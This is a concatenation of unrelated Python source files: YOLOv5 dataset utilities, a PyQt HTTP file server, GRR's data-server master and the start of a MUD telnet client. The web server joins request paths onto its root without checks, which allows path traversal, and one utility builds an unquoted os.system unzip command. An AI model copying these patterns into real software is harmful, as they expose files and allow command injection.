        x1, y1, x2, y2 = [max(x, 0) for x in c]  # allocate coords

        # Labels
        labels, segments = self.labels[index].copy(), self.segments[index].copy()
        if labels.size:
            labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady)  # normalized xywh to pixel xyxy format
            segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
        labels9.append(labels)
        segments9.extend(segments)

        # Image
        img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:]  # img9[ymin:ymax, xmin:xmax]
        hp, wp = h, w  # height, width previous

    # Offset: take a random 2s x 2s crop of the 3s x 3s canvas.
    yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border]  # mosaic center x, y
    img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]

    # Concat/clip labels
    labels9 = np.concatenate(labels9, 0)
    labels9[:, [1, 3]] -= xc
    labels9[:, [2, 4]] -= yc
    c = np.array([xc, yc])  # centers
    segments9 = [x - c for x in segments9]

    for x in (labels9[:, 1:], *segments9):
        np.clip(x, 0, 2 * s, out=x)  # clip when using random_perspective()

    # Augment
    img9, labels9 = random_perspective(img9, labels9, segments9,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove

    return img9, labels9
def create_folder(path='./new'):
    """Create an empty directory at *path*, discarding any previous contents."""
    try:
        shutil.rmtree(path)  # wipe whatever was there before
    except FileNotFoundError:
        pass  # nothing to delete
    os.makedirs(path)  # fresh, empty output folder
def flatten_recursive(path='../datasets/coco128'):
    """Copy every file found under *path* (recursively) into a sibling
    '<path>_flat' directory, discarding the directory structure."""
    flat_dir = Path(path + '_flat')
    create_folder(flat_dir)  # start from an empty destination
    pattern = str(Path(path)) + '/**/*.*'
    for src in tqdm(glob.glob(pattern, recursive=True)):
        shutil.copyfile(src, flat_dir / Path(src).name)
def extract_boxes(path='../datasets/coco128'):  # from utils.datasets import *; extract_boxes()
    """Convert a detection dataset into a classification dataset: write one
    cropped .jpg per labelled box under ``<path>/classifier/<class>/``.

    Fix: ``astype(np.int)`` -> ``astype(int)`` (the ``np.int`` alias is
    removed in NumPy >= 1.24 and raised AttributeError).
    """
    path = Path(path)  # images dir
    shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None  # remove existing
    files = list(path.rglob('*.*'))
    n = len(files)  # number of files
    for im_file in tqdm(files, total=n):
        if im_file.suffix[1:] in IMG_FORMATS:
            # image
            im = cv2.imread(str(im_file))[..., ::-1]  # BGR to RGB
            h, w = im.shape[:2]

            # labels
            lb_file = Path(img2label_paths([str(im_file)])[0])
            if Path(lb_file).exists():
                with open(lb_file, 'r') as f:
                    lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32)  # labels

                for j, x in enumerate(lb):
                    c = int(x[0])  # class
                    f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg'  # new filename
                    if not f.parent.is_dir():
                        f.parent.mkdir(parents=True)

                    b = x[1:] * [w, h, w, h]  # box
                    b[2:] = b[2:] * 1.2 + 3  # pad
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)

                    b[[0, 2]] = np.clip(b[[0, 2]], 0, w)  # clip boxes outside of image
                    b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
                    assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
    """ Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
    Usage: from utils.datasets import *; autosplit()
    Arguments
        path:            Path to images directory
        weights:         Train, val, test weights (list, tuple)
        annotated_only:  Only use images with an annotated txt file
    """
    root = Path(path)  # images dir
    images = []
    for img_ext in IMG_FORMATS:  # collect image files only
        images += list(root.rglob(f"*.{img_ext}"))
    total = len(images)
    random.seed(0)  # reproducible split assignment
    split_ids = random.choices([0, 1, 2], weights=weights, k=total)  # one split id per image

    txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt']  # 3 txt files
    for name in txt:  # remove any existing split files
        (root.parent / name).unlink(missing_ok=True)

    print(f'Autosplitting images from {root}' + ', using *.txt labeled images only' * annotated_only)
    for split_id, img in tqdm(zip(split_ids, images), total=total):
        if not annotated_only or Path(img2label_paths([str(img)])[0]).exists():  # check label
            with open(root.parent / txt[split_id], 'a') as f:
                f.write('./' + img.relative_to(root.parent).as_posix() + '\n')  # add image to txt file
def verify_image_label(args):
    """Verify one image-label pair.

    *args* is ``(im_file, lb_file, prefix)``. Returns
    ``(im_file, labels, shape, segments, nm, nf, ne, nc, msg)`` where the
    counters flag missing/found/empty/corrupt. NOTE(review): the failure
    branch returns a 9-element *list* (first four entries None) rather than
    a tuple — same unpacking behavior, inconsistent type.
    """
    # Verify one image-label pair
    im_file, lb_file, prefix = args
    nm, nf, ne, nc = 0, 0, 0, 0  # number missing, found, empty, corrupt
    try:
        # verify images
        im = Image.open(im_file)
        im.verify()  # PIL verify
        shape = exif_size(im)  # image size
        assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
        assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'

        # verify labels
        segments = []  # instance segments
        if os.path.isfile(lb_file):
            nf = 1  # label found
            with open(lb_file, 'r') as f:
                l = [x.split() for x in f.read().strip().splitlines() if len(x)]
                # Rows with more than 8 numbers are polygon segments; convert
                # them to (cls, xywh) boxes.
                if any([len(x) > 8 for x in l]):  # is segment
                    classes = np.array([x[0] for x in l], dtype=np.float32)
                    segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l]  # (cls, xy1...)
                    l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1)  # (cls, xywh)
                l = np.array(l, dtype=np.float32)
            if len(l):
                assert l.shape[1] == 5, 'labels require 5 columns each'
                assert (l >= 0).all(), 'negative labels'
                assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
                assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
            else:
                ne = 1  # label empty
                l = np.zeros((0, 5), dtype=np.float32)
        else:
            nm = 1  # label missing
            l = np.zeros((0, 5), dtype=np.float32)
        return im_file, l, shape, segments, nm, nf, ne, nc, ''
    except Exception as e:
        # Any verification failure marks the pair corrupt and reports why.
        nc = 1
        msg = f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}'
        return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
    """ Return dataset statistics dictionary with images and instances counts per split per class
    To run in parent directory: export PYTHONPATH="$PWD/yolov5"
    Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
    Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
    Arguments
        path:           Path to data.yaml or data.zip (with data.yaml inside data.zip)
        autodownload:   Attempt to download dataset if not found locally
        verbose:        Print stats dictionary
    """

    def round_labels(labels):
        # Update labels to integer class and 6 decimal place floats
        return [[int(c), *[round(x, 4) for x in points]] for c, *points in labels]

    def unzip(path):
        # Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
        if str(path).endswith('.zip'):  # path is data.zip
            assert Path(path).is_file(), f'Error unzipping {path}, file not found'
            assert os.system(f'unzip -q {path} -d {path.parent}') == 0, f'Error unzipping {path}'
            dir = path.with_suffix('')  # dataset directory
            return True, str(dir), next(dir.rglob('*.yaml'))  # zipped, data_dir, yaml_path
        else:  # path is data.yaml
            return False, None, path

    def hub_ops(f, max_dim=1920):
        # HUB ops for 1 image 'f': downscale so the long side <= max_dim, save as JPEG.
        # NOTE: closes over im_dir, which is assigned in the hub branch below.
        im = Image.open(f)
        r = max_dim / max(im.height, im.width)  # ratio
        if r < 1.0:  # image too large
            im = im.resize((int(im.width * r), int(im.height * r)))
        im.save(im_dir / Path(f).name, quality=75)  # save

    zipped, data_dir, yaml_path = unzip(Path(path))
    with open(check_file(yaml_path), encoding='ascii', errors='ignore') as f:
        data = yaml.safe_load(f)  # data dict
    if zipped:
        data['path'] = data_dir  # TODO: should this be dir.resolve()?
    check_dataset(data, autodownload)  # download dataset if missing
    hub_dir = Path(data['path'] + ('-hub' if hub else ''))
    stats = {'nc': data['nc'], 'names': data['names']}  # statistics dictionary
    for split in 'train', 'val', 'test':
        if data.get(split) is None:
            stats[split] = None  # i.e. no test set
            continue
        x = []
        dataset = LoadImagesAndLabels(data[split])  # load dataset
        # Per-image class histogram -> shape (num_images, nc).
        for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
            x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
        x = np.array(x)  # shape(128x80)
        stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
                        'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
                                        'per_class': (x > 0).sum(0).tolist()},
                        'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
                                   zip(dataset.img_files, dataset.labels)]}

        if hub:
            im_dir = hub_dir / 'images'
            im_dir.mkdir(parents=True, exist_ok=True)
            for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
                pass

    # Profile: time .npy vs .json save/load round-trips for the stats dict.
    stats_path = hub_dir / 'stats.json'
    if profile:
        for _ in range(1):
            file = stats_path.with_suffix('.npy')
            t1 = time.time()
            np.save(file, stats)
            t2 = time.time()
            x = np.load(file, allow_pickle=True)
            print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')

            file = stats_path.with_suffix('.json')
            t1 = time.time()
            with open(file, 'w') as f:
                json.dump(stats, f)  # save stats *.json
            t2 = time.time()
            with open(file, 'r') as f:
                x = json.load(f)  # load hyps dict
            print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')

    # Save, print and return
    if hub:
        print(f'Saving {stats_path.resolve()}...')
        with open(stats_path, 'w') as f:
            json.dump(stats, f)  # save stats.json
    if verbose:
        print(json.dumps(stats, indent=2, sort_keys=False))
    return stats
|
WebServer.py
|
import re
import socket
import threading
from time import sleep
from PyQt5.QtCore import pyqtSignal
from typing import Tuple
from Network import StopThreading
class WebLogic:
    """Lightweight non-blocking HTTP file server driven from a Qt GUI.

    NOTE(review): ``pyqtSignal`` descriptors only function on QObject
    subclasses; presumably this class is combined with a QObject elsewhere
    in the application — confirm before using standalone.
    """

    # Signal used to push status text to the GUI log widget.
    signal_write_msg = pyqtSignal(str)

    def __init__(self):
        self.tcp_socket = None            # listening TCP socket
        self.sever_th = None              # accept/poll worker thread
        self.dir = None                   # web root directory (set externally)
        self.client_socket_list = list()  # connected (socket, address) pairs

    def web_server_start(self, port: int) -> None:
        """
        Helper: start the WEB server listening on *port* and spawn the
        service thread.
        """
        self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Allow address reuse so a previous run's TIME_WAIT does not block the bind.
        self.tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Make the listening socket non-blocking.
        self.tcp_socket.setblocking(False)
        try:
            self.tcp_socket.bind(('', port))
        except Exception as ret:
            msg = '请检查端口号\n'
            self.signal_write_msg.emit(msg)
        else:
            self.tcp_socket.listen()
            self.sever_th = threading.Thread(target=self.web_server_concurrency)
            self.sever_th.start()
            msg = 'WEB服务端正在监听端口:%s\n' % str(port)
            self.signal_write_msg.emit(msg)

    def web_server_concurrency(self) -> None:
        """
        Thread body: accept new browser connections and poll existing ones.

        Runs on a child thread so the main (GUI) thread stays responsive;
        uses non-blocking sockets polled in a loop instead of one thread per
        client to keep resource usage low.
        """
        while True:
            try:
                client_socket, client_address = self.tcp_socket.accept()
            except Exception as ret:
                sleep(0.002)  # nothing pending; short sleep avoids a busy spin
            else:
                client_socket.setblocking(False)
                # Remember the new client socket for the polling loop below.
                self.client_socket_list.append((client_socket, client_address))
                msg = f'WEB服务端已连接浏览器,IP:{client_address[0]}端口:{client_address[1]}\n'
                self.signal_write_msg.emit(msg)
            # Poll every known client for request data.
            for client, address in self.client_socket_list:
                try:
                    recv_msg = client.recv(1024)
                except Exception as ret:
                    pass  # non-blocking recv with no data raises; skip this client
                else:
                    if recv_msg:
                        msg = recv_msg.decode('utf-8')
                        msg_lines = msg.splitlines()
                        # Extract the request path from the HTTP request line.
                        msg_dir = re.match(r"[^/]+(/[^ ]*)", msg_lines[0])
                        msg_dir = msg_dir.group(1)
                        msg = '来自IP:{}端口:{}:\n请求路径:{}\n'.format(address[0], address[1], msg_dir)
                        self.signal_write_msg.emit(msg)
                        self.web_send(client, msg_dir)
                    else:
                        # Empty read: browser closed the connection.
                        # NOTE(review): removing from the list while iterating it
                        # can skip the following entry — confirm intent.
                        client.close()
                        self.client_socket_list.remove((client, address))

    def web_send_msg(self, msg_dir) -> Tuple[bytes, bytes]:
        """
        Build the HTTP response for a browser request.
        :param msg_dir: path requested by the browser
        :return: (header bytes, body bytes)
        """
        # Map '/' to the home page.
        if str(msg_dir) == '/':
            msg_dir = '/index.html'
            dir = str(self.dir) + str(msg_dir)
        else:
            dir = str(self.dir) + str(msg_dir)
        # Build the Content-Type line for the requested file type.
        file_header = self.web_file_header(msg_dir)
        # Open and read the requested file.
        try:
            with open(dir, 'rb') as f:
                file = f.read()
        except Exception as ret:
            # File could not be opened: 404 with a short message body.
            file = '你要的东西不见了'.encode('utf-8')
            response_header = ('HTTP/1.1 404 NOT FOUND\r\n' +
                               'Connection: Keep-Alive\r\n' +
                               'Content-Length: %d\r\n' % len(file) +
                               file_header +
                               '\r\n')
        else:
            # File opened: 200 with its contents.
            response_header = ('HTTP/1.1 200 OK\r\n' +
                               'Connection: Keep-Alive\r\n' +
                               'Content-Length: %d\r\n' % len(file) +
                               file_header +
                               '\r\n')
        response_body = file
        return response_header.encode('utf-8'), response_body

    @staticmethod
    def web_file_header(msg_dir) -> str:
        """
        Build the Content-Type header line for the requested file type.
        :param msg_dir: path requested by the browser
        :return: Content-Type header line
        """
        try:
            file_type = re.match(r'[^.]+\.(.*)$', msg_dir)
            file_type = file_type.group(1)
            if file_type == 'png':
                file_header = 'Content-Type: image/%s; charset=utf-8\r\n' % file_type
            elif file_type == 'css' or file_type == 'html':
                file_header = 'Content-Type: text/%s; charset=utf-8\r\n' % file_type
            else:
                file_header = 'Content-Type: text/html; charset=utf-8\r\n'
        except Exception as ret:
            # No extension (regex group failed): default to HTML.
            file_header = 'Content-Type: text/html; charset=utf-8\r\n'
            return file_header
        else:
            # NOTE(review): both branches return the same variable; the early
            # return in the except plus this else is redundant but harmless.
            return file_header

    def web_send(self, client, msg_dir) -> None:
        """
        Send the HTTP response (header + body) to one browser client.
        """
        try:
            # Build header and body via web_send_msg.
            header, body = self.web_send_msg(msg_dir)
            client.send(header)
            client.send(body)
            msg = 'WEB服务端已回复\n'
            self.signal_write_msg.emit(msg)
        except Exception as ret:
            print(ret)
            msg = '发送失败\n'
            self.signal_write_msg.emit(msg)

    def web_close(self) -> None:
        """
        Helper: close all client sockets, the listening socket and stop
        the worker threads.
        """
        try:
            for client, address in self.client_socket_list:
                client.close()
            self.tcp_socket.close()
            msg = '已断开网络\n'
            self.signal_write_msg.emit(msg)
        except Exception as ret:
            pass  # already closed / never opened
        try:
            StopThreading.stop_thread(self.sever_th)
        except Exception:
            pass
        try:
            # NOTE(review): self.client_th is never assigned anywhere in this
            # class, so this always raises and is swallowed — confirm intent.
            StopThreading.stop_thread(self.client_th)
        except Exception:
            pass
# NOTE(review): presumably connection-state / connection-type identifiers
# shared with the GUI's connection selector — confirm against the Network module.
NoLink = -1
WebServer = 4
|
master.py
|
#!/usr/bin/env python
"""Data master specific classes."""
import socket
import threading
import urlparse
import urllib3
from urllib3 import connectionpool
import logging
from grr.lib import config_lib
from grr.lib import rdfvalue
from grr.lib import utils
from grr.server.data_server import constants
from grr.server.data_server import rebalance
from grr.server.data_server import utils as sutils
class DataMasterError(Exception):
    """Raised when some critical error happens in the data master."""
class DataServer(object):
    """DataServer objects for each data server.

    Wraps one rdfvalue.DataServerInformation record plus local registration
    bookkeeping; getters/setters below delegate to that record.
    """

    def __init__(self, location, index):
        # Parse location.
        loc = urlparse.urlparse(location, scheme="http")
        offline = rdfvalue.DataServerState.Status.OFFLINE
        # New servers start OFFLINE with zero size/load until they report in.
        state = rdfvalue.DataServerState(size=0, load=0, status=offline)
        self.server_info = rdfvalue.DataServerInformation(index=index,
                                                          address=loc.hostname,
                                                          port=loc.port,
                                                          state=state)
        self.registered = False  # set once the server registers with the master
        self.removed = False     # set when the server is removed from the pool
        logging.info("Configured DataServer on %s:%d", self.Address(), self.Port())

    def SetInitialInterval(self, num_servers):
        """Assign this server its initial share of the keyspace."""
        self.server_info.interval = sutils.CreateStartInterval(self.Index(),
                                                               num_servers)

    def IsRegistered(self):
        return self.registered

    def Matches(self, addr, port):
        """Check whether (addr, port) refers to this server.

        *addr* may be a list of addresses (exact membership test) or a single
        hostname/IP (compared after DNS resolution).
        """
        if isinstance(addr, list):
            if self.Address() not in addr:
                return False
        else:
            # Handle hostnames and IPs
            if socket.gethostbyname(self.Address()) != socket.gethostbyname(addr):
                return False
        return self.Port() == port

    def Register(self):
        """Once the server is registered, it is allowed to use the database."""
        self.registered = True

    def Deregister(self):
        self.registered = False

    def Port(self):
        return self.server_info.port

    def Address(self):
        return self.server_info.address

    def Index(self):
        return self.server_info.index

    def SetIndex(self, newindex):
        self.server_info.index = newindex

    def Size(self):
        return self.server_info.state.size

    def Load(self):
        return self.server_info.state.load

    def Interval(self):
        return self.server_info.interval

    def SetInterval(self, start, end):
        self.server_info.interval.start = start
        self.server_info.interval.end = end

    def GetInfo(self):
        return self.server_info

    def UpdateState(self, newstate):
        """Update state of server."""
        self.server_info.state = newstate

    def Remove(self):
        """Mark this server as removed from the pool (see WasRemoved)."""
        self.removed = True

    def WasRemoved(self):
        return self.removed
class DataMaster(object):
    """DataMaster information.

    Coordinates the group of data servers: keeps the authoritative
    server-to-interval mapping, registers/deregisters servers, and drives
    rebalance operations over HTTP (urllib3 connection pools).
    """

    def __init__(self, myport, service):
        """Builds the server group from config and registers the master.

        Args:
          myport: Port this process listens on; must match the first entry
            of Dataserver.server_list (the master must be listed first).
          service: Storage service used to load/save the server mapping and
            report size/component statistics.

        Raises:
          DataMasterError: If the server list is empty, the stored mapping
            disagrees with the configuration, or this server is not the
            first entry of Dataserver.server_list.
        """
        self.service = service
        stores = config_lib.CONFIG["Dataserver.server_list"]
        if not stores:
            logging.error("Dataserver.server_list is empty: no data servers will"
                          " be available")
            raise DataMasterError("Dataserver.server_list is empty")
        self.servers = [DataServer(loc, idx) for idx, loc in enumerate(stores)]
        self.registered_count = 0
        # Load server mapping.
        self.mapping = self.service.LoadServerMapping()
        if not self.mapping:
            # Bootstrap mapping.
            # Each server information is linked to its corresponding object.
            # Updating the data server object will reflect immediately on
            # the mapping.
            for server in self.servers:
                server.SetInitialInterval(len(self.servers))
            servers_info = [server.server_info for server in self.servers]
            self.mapping = rdfvalue.DataServerMapping(version=0,
                                                      num_servers=len(self.servers),
                                                      servers=servers_info)
            self.service.SaveServerMapping(self.mapping, create_pathing=True)
        else:
            # Check mapping and configuration matching.
            if len(self.mapping.servers) != len(self.servers):
                raise DataMasterError("Server mapping does not correspond "
                                      "to the configuration.")
            for server in self.servers:
                # NOTE(review): _EnsureServerInMapping returns False on an
                # address/port mismatch but the result is ignored here —
                # confirm whether a mismatch should raise instead.
                self._EnsureServerInMapping(server)
        # Create locks.
        self.server_lock = threading.Lock()
        # Register the master.
        self.myself = self.servers[0]
        if self.myself.Port() == myport:
            self._DoRegisterServer(self.myself)
        else:
            raise DataMasterError("First server in Dataserver.server_list must be "
                                  "the master.")
        # Start database measuring thread.
        sleep = config_lib.CONFIG["Dataserver.stats_frequency"]
        self.periodic_thread = utils.InterruptableThread(
            target=self._PeriodicThread, sleep_time=sleep)
        self.periodic_thread.start()
        # Holds current rebalance operation.
        self.rebalance = None
        self.rebalance_pool = []

    def LoadMapping(self):
        """Returns the current (live) server mapping."""
        return self.mapping

    def _PeriodicThread(self):
        """Periodically update our state and store the mappings."""
        ok = rdfvalue.DataServerState.Status.AVAILABLE
        num_components, avg_component = self.service.GetComponentInformation()
        state = rdfvalue.DataServerState(size=self.service.Size(),
                                         load=0,
                                         status=ok,
                                         num_components=num_components,
                                         avg_component=avg_component)
        self.myself.UpdateState(state)
        self.service.SaveServerMapping(self.mapping)

    def _EnsureServerInMapping(self, server):
        """Ensure that the data server exists on the mapping.

        Returns False if the stored mapping entry does not match the
        configured address/port; otherwise links the server object to the
        mapping entry so future updates are reflected in the mapping.
        """
        index = server.Index()
        server_info = self.mapping.servers[index]
        if server_info.address != server.Address():
            return False
        if server_info.port != server.Port():
            return False
        # Change underlying server information.
        server.server_info = server_info

    def RegisterServer(self, addr, port):
        """Register incoming data server. Return server object."""
        for server in self.servers:
            if server == self.myself:
                # The master registered itself in __init__.
                continue
            if server.Matches(addr, port):
                with self.server_lock:
                    if server.IsRegistered():
                        # Refuse double registration.
                        return None
                    else:
                        self._DoRegisterServer(server)
                        return server
        return None

    def HasServer(self, addr, port):
        """Checks if a given server is already in the set."""
        for server in self.servers:
            if server.Matches(addr, port):
                return server
        return None

    def _DoRegisterServer(self, server):
        # Caller is expected to hold server_lock (except during __init__).
        self.registered_count += 1
        server.Register()
        logging.info("Registered server %s:%d", server.Address(), server.Port())
        if self.AllRegistered():
            logging.info("All data servers have registered!")

    def DeregisterServer(self, server):
        """Deregister a data server."""
        with self.server_lock:
            server.Deregister()
            self.registered_count -= 1

    def AllRegistered(self):
        """Check if all servers have registered."""
        return self.registered_count == len(self.servers)

    def Stop(self):
        # Persist the latest mapping before shutting the stats thread down.
        self.service.SaveServerMapping(self.mapping)
        self.periodic_thread.Stop()

    def SetRebalancing(self, reb):
        """Sets a new rebalance operation and starts communication with servers."""
        self.rebalance = reb
        self.rebalance_pool = []
        try:
            # One HTTP connection pool per data server for the operation.
            for serv in self.servers:
                pool = connectionpool.HTTPConnectionPool(serv.Address(),
                                                         port=serv.Port())
                self.rebalance_pool.append(pool)
        except urllib3.exceptions.MaxRetryError:
            self.CancelRebalancing()
            return False
        return True

    def CancelRebalancing(self):
        """Drops the current rebalance operation and closes its pools."""
        self.rebalance = None
        for pool in self.rebalance_pool:
            pool.close()
        self.rebalance_pool = []

    def IsRebalancing(self):
        # NOTE(review): returns the rebalance object itself (truthy/None),
        # not a bool — callers appear to use it only in boolean context.
        return self.rebalance

    def AddServer(self, addr, port):
        """Add new server to the group."""
        server = DataServer("http://%s:%d" % (addr, port), len(self.servers))
        self.servers.append(server)
        # New servers start with an empty interval at the top of the range.
        server.SetInterval(constants.MAX_RANGE, constants.MAX_RANGE)
        self.mapping.servers.Append(server.GetInfo())
        self.mapping.num_servers += 1
        # At this point, the new server is now part of the group.
        return server

    def RemoveServer(self, removed_server):
        """Remove a server. Returns None if server interval is not empty."""
        interval = removed_server.Interval()
        # Interval range must be 0.
        if interval.start != interval.end:
            return None
        # Update ids of other servers.
        newserverlist = []
        for serv in self.servers:
            if serv == removed_server:
                continue
            if serv.Index() > removed_server.Index():
                # Shift indexes down to fill the gap.
                serv.SetIndex(serv.Index() - 1)
            newserverlist.append(serv.GetInfo())
        # Change list of servers.
        self.mapping.servers = newserverlist
        self.mapping.num_servers -= 1
        self.servers.pop(removed_server.Index())
        self.DeregisterServer(removed_server)
        removed_server.Remove()
        return removed_server

    def SyncMapping(self, skip=None):
        """Syncs mapping with other servers.

        Args:
          skip: Optional collection of servers to leave out of the sync.

        Returns:
          True on success, False if any server failed to sync or a
          connection could not be established.
        """
        pools = []
        try:
            # Update my state.
            self._PeriodicThread()
            for serv in self.servers[1:]:
                if skip and serv in skip:
                    continue
                pool = connectionpool.HTTPConnectionPool(serv.Address(),
                                                         port=serv.Port())
                pools.append((serv, pool))
            body = self.mapping.SerializeToString()
            headers = {"Content-Length": len(body)}
            for serv, pool in pools:
                res = pool.urlopen("POST", "/servers/sync", headers=headers,
                                   body=body)
                if res.status != constants.RESPONSE_OK:
                    logging.warning("Could not sync with server %s:%d", serv.Address(),
                                    serv.Port())
                    return False
                # Each server replies with its refreshed state.
                state = rdfvalue.DataServerState()
                state.ParseFromString(res.data)
                serv.UpdateState(state)
        except urllib3.exceptions.MaxRetryError:
            return False
        finally:
            for _, pool in pools:
                pool.close()
        return True

    def FetchRebalanceInformation(self):
        """Asks data servers for number of changes for rebalancing."""
        body = self.rebalance.SerializeToString()
        size = len(body)
        headers = {"Content-Length": size}
        for pool in self.rebalance_pool:
            try:
                res = pool.urlopen("POST", "/rebalance/statistics", headers=headers,
                                   body=body)
                if res.status != constants.RESPONSE_OK:
                    self.CancelRebalancing()
                    return False
                reb = rdfvalue.DataServerRebalance()
                reb.ParseFromString(res.data)
                # Each server reports how much data it would have to move.
                ls = list(reb.moving)
                if ls:
                    logging.warning("Moving %d", ls[0])
                    self.rebalance.moving.Append(ls[0])
                else:
                    self.CancelRebalancing()
                    return False
            except urllib3.exceptions.MaxRetryError:
                self.CancelRebalancing()
                return False
        return True

    def CopyRebalanceFiles(self):
        """Tell servers to copy files to the corresponding servers."""
        body = self.rebalance.SerializeToString()
        size = len(body)
        headers = {"Content-Length": size}
        for pool in self.rebalance_pool:
            try:
                res = pool.urlopen("POST", "/rebalance/copy", headers=headers,
                                   body=body)
                if res.status != constants.RESPONSE_OK:
                    self.CancelRebalancing()
                    return False
            except urllib3.exceptions.MaxRetryError:
                self.CancelRebalancing()
                return False
        return True

    def RebalanceCommit(self):
        """Tell servers to commit rebalance changes.

        Returns:
          The updated mapping on success, None if any server failed to
          commit (in which case the operation is cancelled).
        """
        # Save rebalance information to a file, so we can recover later.
        rebalance.SaveCommitInformation(self.rebalance)
        body = self.rebalance.SerializeToString()
        size = len(body)
        headers = {"Content-Length": size}
        for i, pool in enumerate(self.rebalance_pool):
            try:
                res = pool.urlopen("POST", "/rebalance/perform", headers=headers,
                                   body=body)
                if res.status != constants.RESPONSE_OK:
                    logging.error("Server %d failed to perform transaction %s", i,
                                  self.rebalance.id)
                    self.CancelRebalancing()
                    return None
                stat = rdfvalue.DataServerState()
                stat.ParseFromString(res.data)
                data_server = self.servers[i]
                data_server.UpdateState(stat)
            except urllib3.exceptions.MaxRetryError:
                self.CancelRebalancing()
                return None
        # Update server intervals.
        mapping = self.rebalance.mapping
        for i, serv in enumerate(list(self.mapping.servers)):
            serv.interval = mapping.servers[i].interval
        self.rebalance.mapping = self.mapping
        self.service.SaveServerMapping(self.mapping)
        # We can finally delete the temporary file, since we have succeeded.
        rebalance.DeleteCommitInformation(self.rebalance)
        rebalance.RemoveDirectory(self.rebalance)
        self.CancelRebalancing()
        return self.mapping
|
pycat.py
|
#!/usr/bin/env python3
from proxy import proxy
from select import select
import importlib
import json
import os
import pprint
import re
import sys
import telnetlib
import threading
import traceback
# telnetlib does not define the GMCP telnet option (201 / 0xc9), so patch it
# onto the module for use in the option negotiation below.
telnetlib.GMCP = b'\xc9'
class Session(object):
    """One MUD session: bridges a telnet connection to the MUD with a local
    client pipe/socket (via proxy), running triggers/aliases from a
    hot-reloadable "world" module.
    """

    def __init__(self, world_module, port, arg):
        # MUD side talks latin-1; the local client side talks UTF-8.
        self.mud_encoding = 'iso-8859-1'
        self.client_encoding = 'utf-8'
        self.world_module = world_module
        self.arg = arg
        # World object implements getHostPort/trigger/alias/handleGmcp/quit.
        self.world = world_module.getClass()(self, self.arg)
        try:
            self.socketToPipeR, self.pipeToSocketW, self.stopFlag, runProxy = proxy('::1', port)
            self.pipeToSocketW = os.fdopen(self.pipeToSocketW, 'wb')
            self.proxyThread = threading.Thread(target=runProxy)
            self.proxyThread.start()
            host_port = self.world.getHostPort()
            self.log("Connecting")
            self.telnet = self.connect(*host_port)
            self.log("Connected")
        except:
            # Tear everything down on any startup failure, then re-raise.
            self.log("Shutting down")
            self.stopFlag.set()
            self.world.quit()
            raise

    def join(self):
        # NOTE(review): self.thr is never assigned in this class — this
        # would raise AttributeError if called; confirm it is unused.
        self.thr.join()

    def log(self, *args, **kwargs):
        """Write a log message to the client pipe.

        NOTE(review): kwargs is accepted but ignored.
        """
        if len(args) == 1 and type(args[0]) == str:
            line = args[0]
        else:
            line = pprint.pformat(args)
        self.pipeToSocketW.write("---------\n".encode(self.client_encoding))
        self.pipeToSocketW.write(line.encode(self.client_encoding))
        self.pipeToSocketW.write(b"\n")
        self.pipeToSocketW.flush()

    def strip_ansi(self, line):
        # Remove ANSI/CSI escape sequences.
        return re.sub(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]', '', line)

    def gmcpOut(self, msg):
        # Send a GMCP subnegotiation: IAC SB GMCP <msg> IAC SE.
        self.telnet.sock.sendall(telnetlib.IAC + telnetlib.SB + telnetlib.GMCP + msg.encode(self.mud_encoding) + telnetlib.IAC + telnetlib.SE)

    def iac(self, sock, cmd, option):
        """Telnet option-negotiation callback (set on the Telnet object).

        Accepts GMCP and TTYPE offers, refuses everything else, and
        dispatches completed GMCP subnegotiations to handleGmcp.
        """
        if cmd == telnetlib.WILL:
            if option == telnetlib.GMCP:
                self.log("Enabling GMCP")
                sock.sendall(telnetlib.IAC + telnetlib.DO + option)
                self.gmcpOut('Core.Hello { "client": "Cizra", "version": "1" }')
